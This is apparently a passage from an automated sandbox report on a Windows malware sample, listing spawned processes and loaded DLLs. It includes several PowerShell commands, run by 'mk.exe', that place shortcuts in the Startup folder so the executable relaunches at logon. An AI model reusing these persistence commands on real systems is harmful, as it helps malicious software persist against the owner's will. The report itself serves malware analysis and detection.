Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=06d4af6f50.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=06d4af6f50.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1932,i,3331334219866744082,9908711228420436626,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1932,i,3331334219866744082,9908711228420436626,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2004,i,16542196128712413035,6569779122986016957,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yiuq.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zzvy.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dslm.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tytb.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\akdz.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kncs.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\syie.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsap.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: winmm.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: wininet.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: sspicli.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: mstask.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: wldp.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: mpr.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: dui70.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: duser.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: chartv.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: oleacc.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: winsta.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: textshaping.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: propsys.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: iertutil.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: profapi.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: edputil.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: urlmon.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: srvcli.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: netutils.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: appresolver.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: slc.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: userenv.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: sppc.dll
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Section loaded: msvcp110_win.dll
